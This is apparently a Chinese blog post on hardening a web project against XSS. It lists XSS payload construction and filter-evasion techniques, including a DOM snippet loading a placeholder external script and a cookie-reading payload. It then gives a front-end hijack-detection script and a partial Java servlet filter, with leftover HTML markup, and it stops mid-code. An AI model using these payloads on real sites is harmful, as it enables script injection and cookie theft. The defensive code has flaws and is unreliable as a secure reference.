web项目安全漏洞防御实战

LK最近在对已有项目进行安全漏洞防御，现在将一些心得分享出来和大家一起讨论.主要是从下面几个方面进行漏洞修复。
1. 跨站脚本攻击漏洞（xss）
2. 敏感数据未加密传输
3. 验证机制缺陷
4. Cookie中未设HttpOnly标识
5. 危险的HTTP方法未禁用
1.跨站脚本攻击漏洞（xss）

先来了解一下什么是xss
概念
xss又叫css（cross site scripting，跨站脚本攻击），xss攻击通过在web页面插入恶意脚本，当页面被浏览时，恶意脚本会被执行，实现攻击用户的目的。
类型
1.存储型/持久型
存储型指恶意脚本会被存储在服务器端，如数据库中或者文件中。例如留言板等很容易因为输入检验不严谨导致被攻击。
2.反射型/非持久型
反射型一般是带有恶意脚本参数的URL，是一次性的。
3.DOM型
基于DOM文档对象模型的xss漏洞，客户端的恶意脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。可能触发DOM型xss的属性有document.write、innerHTML、location、window.name、document.referer等。
构造方法
1.利用html标记<>进行操作



</code></pre> <p>2.利用html标签属性<br> 利用html标签支持js伪协议形式，如src，href，background、value、action、lowsrc、bgsound、dynsrc等，进行xss注入。如：</p> <pre><code><img src="javascript:alert(1);"/>
<table background="javascript:alert(1);"></table>
</code></pre> <p>3.事件利用<br> 可以利用html中某些动作事件，绑定恶意脚本。常用的事件有mouseover、onclick、onfocus、onerror、onload、onchange等，具体见：html事件属性</p> <pre><code><input type="button" value="click me" "alert(1)" />
</code></pre> <p>.4.利用css跨站<br> css样式表可作为恶意脚本载体，不需要嵌入html中，可以通过link或者@import进行引用，比较隐蔽，不过不同浏览器之间不能通用。</p> <pre><code><div style="background-image:url(javascript:alert(1))"></div>
<style>
    body{background-image:url(javascript:alert(1));}
     //expression中可使用全角字符
    p{background-image:expression(alert(1));}
    <style>@import'javascript:alert('xss');'</style>
</style>

</code></pre> <p>5.规避过滤规则<br> 可利用大小写混淆、拼接和拆分(空格回车和tab绕过)、字符编码等方式，如：</p> <pre><code><scRiPt>alert(1);</scrIPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src="javas		cript:alert(1);"/>//语句必须完整，有分号或者标签对。
//可以将代码用ASCII码替换,也可十进制、十六进制、八进制编码
<img src="javascrip#116&#58alert(1)" />
<a href=&quot;#javascript:alert(&#39;xss&#39;)&quot;>xss</a>
//拆分，可绕过长度限制
<script>z='document.'</script>
<script>z=+'write'("'</script>
<script>z=z+'<script'</script>

</code></pre> <p>6.DOM方法利用</p> <pre><code>var s=document.createElement("script");
s.src="http://xxx/xxx.js";
document.getElementsByTagName("head")[0].appendChild(s);
</code></pre> <p>7.location方法利用<br> 利用location加JavaScript伪代码，将“符号”、“变量名”、“函数名” 都变成字符串，在字符串中可以使用js编码，构造payload。</p> <pre><code><input type="button" value="click me" name=javascript:alert%281%29" location=this.name />
<img src="1" location="javascr"+"ipt:al"+"ert%28docu"+"ment.co"+"okie%29">

</code></pre> </li> 
   <li> <p><strong>防御</strong><br> 1<mark>前端检验</mark></p> <pre><code> 前端页面引入检测脚本------------httphijack1.1.0.js
 这是git上前端大神写的对其进行了小小的修改，与h5和node相关的部分暂且不用
</code></pre> <p>他主要检测了以下几方面攻击<br> 1）所有内联事件执行的代码<br> 2）href 属性 javascript: 内嵌的代码<br> 3）静态脚本文件内容<br> 4）动态添加的脚本文件内容<br> 5）document-write添加的内容<br> 6）iframe嵌套<br> 具体脚本如下：</p> <pre><code>
'use strict';
(function(window) {

var httphijack = function() {},
    inlineEventMap = {}, //内联事件扫描记录
    inlineEventId = 0, //内联事件扫描ID
    scanInlineElement = false; //是否需要扫描内联事件

// 安全域，白名单
var safeList = [
    /([a-zA-Z|a-zA-Z\d])+(\.)+(yy|duowan|yystatic|baidu|hiido|qq|baidu|gclick|minisplat|baidustatic|huanjuyun|sina|1931)+(\.)+[A-Za-z]{2,14}/i, //*.yy.com
    /((https|http):\/\/)+([a-zA-Z|a-zA-Z\d])+(\.)+(yy|duowan|yystatic|baidu|hiido|qq|baidu|gclick|minisplat|baidustatic|huanjuyun|sina|1931)+(\.)+[A-Za-z]{2,14}/i, //http开头
    /([a-zA-Z|a-zA-Z\d])+(\.)+(yy|duowan|yystatic|baidu|hiido|qq|baidu|gclick|minisplat|baidustatic|huanjuyun|sina|1931)+(:[0-9]{1,4})+(\.)+[A-Za-z]{2,14}/i, //帶端口的請求
    /[a-zA-Z0-9]\:\/\/[a-zA-Z0-9_/]*/i //手机相关
];


// 危险域，黑名单
// var dangerList = [];

// 过滤class关键词
var filterClassName = [
    'BAIDU_DUP_wrapper', //百度推广
    'BAIDU_DSPUI_FLOWBAR'
];

// 过滤name关键词
var filterProName = [
    'text',
    '#text',
    'IFRAME',
    'SCRIPT',
    'IMG'
];

// 过滤id关键词
var filterNodeId = [
    '1qa2ws'
];

var inlineEventList = [
    'alert',
    'location'
];
// reset console
if (!console) {
    window.console = {
        log: function() {
            return true;
        }
    };
}

/**
 * 统计上报函数
 * @param  {[type]} url 拦截脚本地址
 * @param  {[type]} className 拦截插入元素className
 * @param  {[type]} eName 内联事件名称
 * @param  {[type]} fUrl ifrmae乔套url
 */
function hiidoStat(url, className, eName, fUrl) {
    var hiidoParam = {
        'eventid': 10010793,
        'bak1': url,
        'bak2': className,
        'bak3': eName,
        'parm1': fUrl
    };
    
    
    if( url!=""  ||  url!=null ){
    	 console.log("拦截脚本地址"+url)
    }
    if( url!=""  ||  url!=null ){
   	 console.log("拦截插入元素"+className)
   }
    if( url!=""  ||  url!=null ){
   	 console.log("内联事件名称"+eName)
   }
    if( url!=""  ||  url!=null ){
   	 console.log("frmae乔套url"+fUrl)
   }
  //  h5Report(url, className, eName, fUrl);
    window.on_security_interdiction && window.on_security_interdiction.call(window, hiidoParam);
}

/**
 * h5性能检测统计
 * @param  {[type]} url 拦截脚本地址
 * @param  {[type]} className 拦截插入元素className
 * @param  {[type]} eName 内联事件名称
 * @param  {[type]} iframeUrl ifrmae乔套url
 */
//    function h5Report(url, className, eName, iframeUrl) {
//        var databody = {},
//            queryStr = '';
//
//        databody.url = url ? url : '';
//        databody.classname = className ? className : '';
//        databody.name = eName ? eName : '';
//        databody.iframeurl = iframeUrl ? iframeUrl : '';
//        databody.pathname = window.location.pathname;
//        databody.hostname = window.location.hostname;
//        databody.ua = navigator.userAgent;
//
//        for (var n in databody) {
//            if (databody[n] !== '') {
//                queryStr += n + '=' + databody[n] + '&';
//            }
//        }
//
//        (new Image).src = 'http://h5.yy.com/hostage/report?' + queryStr;
//    }
    /**
     * 过滤指定关键字
     * @param  {[Array]} 过滤词库 
     * @param  {[String]} value    [需要验证的字符串]
     * @return {[Boolean]}         [false -- 验证不通过，true -- 验证通过]
     */
    function filter(list, value) {
        if (list === safeList) {
            if (typeof(value) === 'undefined' || value === '') {
                return true;
            }
        } else {
            if (typeof(value) === 'undefined' || value === '') {
                return false;
            }
        }
        var length = list.length,
            i = 0;
        for (; i < length; i++) {
            // 建立黑名单正则
            var reg = new RegExp(list[i]);

            // 存在黑名单中，拦截
            if (reg.test(value.replace('https://', '').replace('http://', ''))) {
                return true;
            }
        }
        return false;
    }

// 内联事件劫持
function inlineEventFilter() {
    var i = 0,
        obj = null;

    for (obj in document) {
        if (/^on./.test(obj)) {
            interceptionInlineEvent(obj, i++);
        }
    }
}

/**
 * 内联事件拦截
 * @param  {[String]} eventName [内联事件名]
 * @param  {[Number]} eventID   [内联事件id]
 * @return {[type]}             [description]
 */
function interceptionInlineEvent(eventName, eventID) {
    var isClick = (eventName === 'onclick');

    document.addEventListener(eventName.substr(2), function(e) {
        scanElement(e.target, isClick, eventName, eventID);
    }, true);
}

/**
 * 扫描元素是否存在内联事件
 * @param  {[DOM]} elem [DOM元素]
 * @param  {[Boolean]} isClick [是否是内联点击事件]
 * @param  {[String]} eventName [内联 on* 事件名]
 * @param  {[Number]} eventID [给每个内联 on* 事件一个id]
 */
function scanElement(elem, isClick, eventName, eventID) {
    var flag = elem.isScan,
        code = '', // 扫描内联代码
        hash = 0;

    // 跳过已扫描的事件
    if (!flag) {
        flag = elem.isScan = ++inlineEventId;
    }

    hash = (flag << 8) | eventID;

    if (hash in inlineEventMap) {
        return;
    }

    inlineEventMap[hash] = true;

    // 非元素节点
    if (elem.nodeType !== Node.ELEMENT_NODE) {
        return;
    }
    //扫描包括 a iframe img video div 等所有可以写内联事件的元素
    if (elem[eventName]) {
        code = elem.getAttribute(eventName);
        if (code && filter(inlineEventList, code)) {
            // 注销事件
            elem[eventName] = null;
            hiidoStat('', '', code, '');
             console.log('拦截可疑内联事件:' + code);
        }
    }

    // 扫描 <a href="javascript:"> 的脚本
    if (isClick && elem.tagName === 'A' && elem.protocol === 'javascript:') {
        code = elem.href.substr(11);
        if (filter(inlineEventList, code)) {
            // 注销代码
            elem.href = 'javascript:void(0)';
            hiidoStat('', '', code, '');
            console.log('拦截可疑事件:' + code);
        }
    }

    // 递归扫描上级元素
    scanElement(elem.parentNode);
}

/**
 * 主动防御 MutationEvent
 * 使用 MutationObserver 进行静态插入脚本的拦截
 * @return {[type]} [description]
 */
//    function interceptionStaticScript() {
//        var MutationObserver = window.MutationObserver || window.WebKitMutationObserver || window.MozMutationObserver;
//        // 该构造函数用来实例化一个新的 Mutation 观察者对象 Mutation 观察者对象能监听在某个范围内的 DOM 树变化
//        if (!MutationObserver) return;
//        var observer = new MutationObserver(function(mutations) {
//            mutations.forEach(function(mutation) {
//                var nodes = mutation.addedNodes;
//
//                // 逐个遍历
//                for (var i = 0; i < nodes.length; i++) {
//                    var node = nodes[i];
//                    // 扫描 script 与 iframe
//                    if (node.tagName === 'SCRIPT' || node.tagName === 'IFRAME') {
//                        // 拦截到可疑iframe
//                        if (node.tagName === 'IFRAME' && node.src && !filter(safeList, node.src)) {
//                            node.parentNode && node.parentNode.removeChild(node);
//                            hiidoStat('', 'insertIFRMAETag', '', node.src);
//                            // console.log('拦截到可疑iframe', node.src);
//
//                        } else if (node.src) {
//                            // 只放行白名单
//                            if (!filter(safeList, node.src)) {
//                                node.parentNode && node.parentNode.removeChild(node);
//                                hiidoStat(node.src, 'insertScriptTag', '', '');
//                                // console.log('拦截可疑静态脚本:', node.src);
//                            }
//                        }
//                    }
//                }
//            });
//        });
//
//        // 传入目标节点和观察选项
//        // 如果 target 为 document 或者 document.documentElement
//        // 则当前文档中所有的节点添加与删除操作都会被观察到d
//        observer.observe(document, {
//            subtree: true,
//            childList: true
//        });
//    }

/**
 * 使用 DOMNodeInserted  进行动态脚本拦截监
 * 此处无法拦截，只能监测
 * @return {[type]} [description]
 */
function interceptionDynamicScript() {
    document.addEventListener('DOMNodeInserted', function(e) {
        var node = e.target;

        if (!filter(safeList, node.src) || filter(filterClassName, node.className) || filter(filterProName, node.name) || filter(filterNodeId, node.id)) {
            node.parentNode.removeChild(node);
            hiidoStat(node.src ? node.src : '', node.className ? node.className : '', node.name ? node.name : '', '');
            console.log('拦截可以创建节点：'+ node.nodeName + ',id为：'+(node.id?node.id:''));
        }
    }, true);
}

/**
 * 重写单个 window 窗口的 document.write 属性
 * @param  {[BOM]} window [浏览器window对象]
 * @return {[type]}       [description]
 */
function resetDocumentWrite(window) {
    var overWrite = window.document.write;

    window.document.write = function(string) {
        if (filter(filterClassName, string) || filter(filterProName, string) || filter(filterNodeId, string)) {
            hiidoStat('', string, '', '');
            // console.log('拦截可疑模块:', string);
            return;
        }
        overWrite.apply(document, arguments);
    };
}

/**
 * 重写单个 window 窗口的 setAttribute 属性
 * @param  {[BOM]} window [浏览器window对象]
 * @return {[type]} [description]
 */
function resetSetAttribute(window) {
    var overWrite = window.Element.prototype.setAttribute;

    window.Element.prototype.setAttribute = function(name, value) {
        if (this.tagName === 'SCRIPT' && /^src$/i.test(name)) {
            if (!filter(safeList, value)) {
                hiidoStat(value, '', '', '');
                // console.log('拦截可疑模块:', value);
                return;
            }
        }
        overWrite.apply(this, arguments);
    };
}

/**
 * 使用 MutationObserver 对生成的 iframe 页面进行监控，
 * 防止调用内部原生 setAttribute 及 document.write
 * @return {[type]} [description]
 */
function defenseIframe() {
    // 先保护当前页面
    installHook(window);
}

/**
 * 实现单个 window 窗口的 setAttribute保护
 * @param  {[BOM]} window [浏览器window对象]
 * @return {[type]}       [description]
 */
function installHook(window) {

    resetSetAttribute(window);
    resetDocumentWrite(window);

    // MutationObserver 的不同兼容性写法
    var MutationObserver = window.MutationObserver || window.WebKitMutationObserver || window.MozMutationObserver;
    if (!MutationObserver) return;
    var observer = new MutationObserver(function(mutations) {
        mutations.forEach(function(mutation) {
            var nodes = mutation.addedNodes;

            for (var i = 0; i < nodes.length; i++) {
                var node = nodes[i];

                // 给生成的 iframe 里环境也装上重写的钩子
                if (node.tagName === 'IFRAME') {
                    node.contentWindow && installHook(node.contentWindow);
                }
            }
        });
    });

    observer.observe(document, {
        subtree: true,
        childList: true
    });
}

/**
 * 使用 Object.defineProperty，锁住call和apply，使之无法被重写
 * @return {[type]} [description]
 */
function lockCallAndApply() {
    // 锁住 call
    try {
        Object.defineProperty(Function.prototype, 'call', {
            value: Function.prototype.call,
            // 当且仅当仅当该属性的 writable 为 true 时，该属性才能被赋值运算符改变
            writable: false,
            // 当且仅当该属性的 configurable 为 true 时，该属性才能够被改变，也能够被删除
            configurable: false,
            enumerable: true
        });
        // 锁住 apply
        Object.defineProperty(Function.prototype, 'apply', {
            value: Function.prototype.apply,
            writable: false,
            configurable: false,
            enumerable: true
        });
    } catch (e) {
        console && console.log(e);
    }

}
/**
 * 操作cookie的方法
 */
var s__cookie = {
    set: function(key, val) {
        var date = new Date();
        date.setTime(date.getTime() + 60 * 1000); //格式化为cookie识别的时间
        document.cookie = key + '=' + val + ';expires=' + date.toGMTString(); //设置cookie
    },
    get: function(key) {
        var getCookie = document.cookie.replace(/[ ]/g, '');
        var arrCookie = getCookie.split(';');
        var tips;
        for (var i = 0; i < arrCookie.length; i++) {
            var arr = arrCookie[i].split('=');
            if (key == arr[0]) {
                tips = arr[1];
                break;
            }
        }
        return tips;
    }
};
/**
 * 重定向iframe url（页面被iframe包裹）
 */
function redirectionIframeSrc() {
    var flag = 'type';

    if (self !== top) {
        var parentUrl = document.referrer,
            length = safeList.length,
            i = 0;

        for (; i < length; i++) {
            // 建立白名单正则
            var reg = new RegExp(safeList[i], 'i');

            // 存在白名单中，放行
            if (reg.test(parentUrl)) {
                return;
            }
        }

        var url = location.href;
        var parts = url.split('#');
        if (location.search) {
            parts[0] += '&' + flag + '=3';
        } else {
            parts[0] += '?' + flag + '=3';
        }
        try {
            if (!s__cookie.get('HtpLocTmp')) {
                top.location.href = parts.join('#');
                // cookie记录这次跳转的时间点
                s__cookie.set('HtpLocTmp', '1');
            }
            hiidoStat('', '', '', parentUrl);
            // console.log('页面被嵌入iframe中:', parentUrl);
        } catch (e) {
            hiidoStat('', '', '', parentUrl);
            // console.log('页面被嵌入iframe中, 重定向失败');
        }
    }
}

// 初始化方法
httphijack.init = function() {
   interceptionDynamicScript();
    scanInlineElement && inlineEventFilter();
  // interceptionStaticScript();
    lockCallAndApply();
    defenseIframe();
   redirectionIframeSrc();
};


if (typeof define === 'function' && define.amd) {
    define('httphijack', [], function() {
        return httphijack;
    });
} else {
    window.httphijack = httphijack;
}

// 不支持 IE8-
if (navigator.appName == 'Microsoft Internet Explorer' && (navigator.appVersion.split(';')[1].replace(/[ ]/g, '') == 'MSIE6.0' || navigator.appVersion.split(';')[1].replace(/[ ]/g, '') == 'MSIE7.0' || navigator.appVersion.split(';')[1].replace(/[ ]/g, '') == 'MSIE8.0')) {
    return;
} else {
    if (!(/localhost/i).test(location.host) || (navigator.appName === 'Microsoft Internet Explorer' && (navigator.appVersion.match(/7./i) !== '7.' || navigator.appVersion.match(/8./i) !== '8.'))) {
        httphijack.init();
    }
}
})(window);
</code></pre> <p>有兴趣的话可以在git上搜里面有详细的功能介绍</p> <p>2.<mark>后端过滤</mark><br> xss防御的重点是后段，因为前端能做的真的很少<br> 后段我是采用<mark>过滤器</mark>实现的</p> 
    <ul> 
     <li>添加xss过滤器</li> 
    </ul> <pre><code class="prism language-java"><span class="token comment">/**
 * 处理xss攻击
 * @author yrz
 *
 */</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">RequestFilter</span> <span class="token keyword">extends</span> <span class="token class-name">OncePerRequestFilter</span><span class="token punctuation">{</span>

	<span class="token annotation punctuation">@Override</span>
	<span class="token keyword">protected</span> <span class="token keyword">void</span> <span class="token function">doFilterInternal</span><span class="token punctuation">(</span>HttpServletRequest request<span class="token punctuation">,</span> HttpServletResponse response<span class="token punctuation">,</span>  FilterChain filterChain<span class="token punctuation">)</span>
			<span class="token keyword">throws</span> ServletException<span class="token punctuation">,</span> IOException <span class="token punctuation">{</span>
		 <span class="token comment">// 将request通过自定义的装饰类进行装饰</span>
        XssRequestWrapper xssRequest <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XssRequestWrapper</span><span class="token punctuation">(</span><span class="token punctuation">(</span>HttpServletRequest<span class="token punctuation">)</span> request<span class="token punctuation">)</span><span class="token punctuation">;</span>     
     filterChain<span class="token punctuation">.</span><span class="token function">doFilter</span><span class="token punctuation">(</span>xssRequest<span class="token punctuation">,</span> response<span class="token punctuation">)</span><span class="token punctuation">;</span>
        
	<span class="token punctuation">}</span>

<span class="token punctuation">}</span>

</code></pre> 
    <ul> 
     <li><mark>reqeust包装类,重写getParameter()等方法,这里面对参数的转义和替换,根据实际需求更改</mark></li> 
    </ul> <pre><code class="prism language-java"><span class="token keyword">package</span> com<span class="token punctuation">.</span>sinosoft<span class="token punctuation">.</span>filter<span class="token punctuation">;</span>

<span class="token keyword">import</span> java<span class="token punctuation">.</span>util<span class="token punctuation">.</span>HashMap<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>util<span class="token punctuation">.</span>Iterator<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>util<span class="token punctuation">.</span>Map<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>util<span class="token punctuation">.</span>regex<span class="token punctuation">.</span>Pattern<span class="token punctuation">;</span>

<span class="token keyword">import</span> javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span>HttpServletRequest<span class="token punctuation">;</span>
<span class="token keyword">import</span> javax<span class="token punctuation">.</span>servlet<span class="token punctuation">.</span>http<span class="token punctuation">.</span>HttpServletRequestWrapper<span class="token punctuation">;</span>

<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">XssRequestWrapper</span>  <span class="token keyword">extends</span> <span class="token class-name">HttpServletRequestWrapper</span><span class="token punctuation">{</span>

	 <span class="token keyword">private</span> HttpServletRequest request<span class="token punctuation">;</span>

	    <span class="token keyword">public</span> <span class="token function">XssRequestWrapper</span><span class="token punctuation">(</span>HttpServletRequest request<span class="token punctuation">)</span> <span class="token punctuation">{</span>
	        <span class="token keyword">super</span><span class="token punctuation">(</span>request<span class="token punctuation">)</span><span class="token punctuation">;</span>
	        <span class="token keyword">this</span><span class="token punctuation">.</span>request <span class="token operator">=</span> request<span class="token punctuation">;</span>
	    <span class="token punctuation">}</span>

    <span class="token comment">/**
     * 重写getParameter方法
     */</span>
    <span class="token annotation punctuation">@Override</span>
    <span class="token keyword">public</span> String <span class="token function">getParameter</span><span class="token punctuation">(</span>String name<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        String value <span class="token operator">=</span> <span class="token keyword">super</span><span class="token punctuation">.</span><span class="token function">getParameter</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>value <span class="token operator">==</span> null<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token keyword">return</span> null<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        value <span class="token operator">=</span> <span class="token function">format</span><span class="token punctuation">(</span>value<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> value<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token comment">/**
     * 重写getParameterMap
     */</span>
    <span class="token annotation punctuation">@Override</span>
    <span class="token annotation punctuation">@SuppressWarnings</span><span class="token punctuation">(</span><span class="token string">"unchecked"</span><span class="token punctuation">)</span>
    <span class="token keyword">public</span> Map<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> <span class="token function">getParameterMap</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        HashMap<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> paramMap <span class="token operator">=</span> <span class="token punctuation">(</span>HashMap<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span><span class="token punctuation">)</span> <span class="token keyword">super</span><span class="token punctuation">.</span><span class="token function">getParameterMap</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        paramMap <span class="token operator">=</span> <span class="token punctuation">(</span>HashMap<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span><span class="token punctuation">)</span> paramMap<span class="token punctuation">.</span><span class="token function">clone</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token keyword">for</span> <span class="token punctuation">(</span>Iterator iterator <span class="token operator">=</span> paramMap<span class="token punctuation">.</span><span class="token function">entrySet</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">iterator</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> iterator<span class="token punctuation">.</span><span class="token function">hasNext</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span>
            Map<span class="token punctuation">.</span>Entry<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> entry <span class="token operator">=</span> <span class="token punctuation">(</span>Map<span class="token punctuation">.</span>Entry<span class="token operator"><</span>String<span class="token punctuation">,</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span><span class="token punctuation">)</span> iterator<span class="token punctuation">.</span><span class="token function">next</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            String <span class="token punctuation">[</span><span class="token punctuation">]</span> values <span class="token operator">=</span> entry<span class="token punctuation">.</span><span class="token function">getValue</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">int</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator"><</span> values<span class="token punctuation">.</span>length<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token keyword">if</span><span class="token punctuation">(</span>values<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token keyword">instanceof</span> <span class="token class-name">String</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
                    values<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token function">format</span><span class="token punctuation">(</span>values<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
                <span class="token punctuation">}</span>
            <span class="token punctuation">}</span>
            entry<span class="token punctuation">.</span><span class="token function">setValue</span><span class="token punctuation">(</span>values<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">return</span> paramMap<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>


    <span class="token comment">/**
     * 重写getParameterValues
     */</span>
    <span class="token annotation punctuation">@Override</span>
    <span class="token keyword">public</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token function">getParameterValues</span><span class="token punctuation">(</span>String name<span class="token punctuation">)</span> <span class="token punctuation">{</span>
         String<span class="token punctuation">[</span><span class="token punctuation">]</span> values <span class="token operator">=</span> <span class="token keyword">super</span><span class="token punctuation">.</span><span class="token function">getParameterValues</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">;</span>  
         <span class="token keyword">int</span> count <span class="token operator">=</span> values<span class="token punctuation">.</span>length<span class="token punctuation">;</span>  
            String<span class="token punctuation">[</span><span class="token punctuation">]</span> encodedValues <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">String</span><span class="token punctuation">[</span>count<span class="token punctuation">]</span><span class="token punctuation">;</span>  
            <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">int</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator"><</span> count<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>  
                encodedValues<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token function">format</span><span class="token punctuation">(</span>values<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
            <span class="token punctuation">}</span>  
        <span class="token keyword">return</span> encodedValues<span class="token punctuation">;</span>  
    <span class="token punctuation">}</span>

    <span class="token comment">/**
     * 重写getHeader
     */</span>
    <span class="token annotation punctuation">@Override</span>
    <span class="token keyword">public</span> String <span class="token function">getHeader</span><span class="token punctuation">(</span>String name<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token comment">// TODO Auto-generated method stub</span>
        <span class="token keyword">return</span> <span class="token function">format</span><span class="token punctuation">(</span><span class="token keyword">super</span><span class="token punctuation">.</span><span class="token function">getHeader</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>


    <span class="token keyword">public</span> String <span class="token function">filter</span><span class="token punctuation">(</span>String message<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>message <span class="token operator">==</span> null<span class="token punctuation">)</span>
            <span class="token keyword">return</span> <span class="token punctuation">(</span>null<span class="token punctuation">)</span><span class="token punctuation">;</span>
        message <span class="token operator">=</span> <span class="token function">format</span><span class="token punctuation">(</span>message<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> message<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>


     <span class="token comment">/**
     *  @desc 统一处理特殊字符的方法，替换掉sql和js的特殊字符
     *  @param name 要替换的字符
     */</span>
    <span class="token keyword">private</span> String <span class="token function">format</span><span class="token punctuation">(</span>String name<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token function">xssEncode</span><span class="token punctuation">(</span>name<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token comment">/** 
     * 将容易引起xss & sql漏洞的半角字符直接替换成全角字符 
     *  
     * @param s 
     * @return 
     */</span>  
    <span class="token keyword">private</span> <span class="token keyword">static</span> String <span class="token function">xssEncode</span><span class="token punctuation">(</span>String s<span class="token punctuation">)</span> <span class="token punctuation">{</span>  
        <span class="token keyword">if</span> <span class="token punctuation">(</span>s <span class="token operator">==</span> null <span class="token operator">||</span> s<span class="token punctuation">.</span><span class="token function">isEmpty</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>  
            <span class="token keyword">return</span> s<span class="token punctuation">;</span>  
        <span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>  
            s <span class="token operator">=</span> <span class="token function">stripXSSAndSql</span><span class="token punctuation">(</span>s<span class="token punctuation">)</span><span class="token punctuation">;</span>  
        <span class="token punctuation">}</span>  
        StringBuilder sb <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">StringBuilder</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span><span class="token function">length</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
        <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">int</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator"><</span> s<span class="token punctuation">.</span><span class="token function">length</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>  
            <span class="token keyword">char</span> c <span class="token operator">=</span> s<span class="token punctuation">.</span><span class="token function">charAt</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">;</span>  
            <span class="token keyword">switch</span> <span class="token punctuation">(</span>c<span class="token punctuation">)</span> <span class="token punctuation">{</span>  
            <span class="token keyword">case</span> <span class="token string">'>'</span><span class="token operator">:</span>  
                sb<span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"＞"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">// 转义大于号  </span>
                <span class="token keyword">break</span><span class="token punctuation">;</span>  
            <span class="token keyword">case</span> <span class="token string">'<'</span><span class="token operator">:</span>  
                sb<span class="token punctuation">.</span><span class="token function">append</span><span class="token punctuation">(</span><span class="token string">"＜"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">// 转义小于号  </span>
                <span class="token keyword">break</span><span class="token punctuation">;</span>  
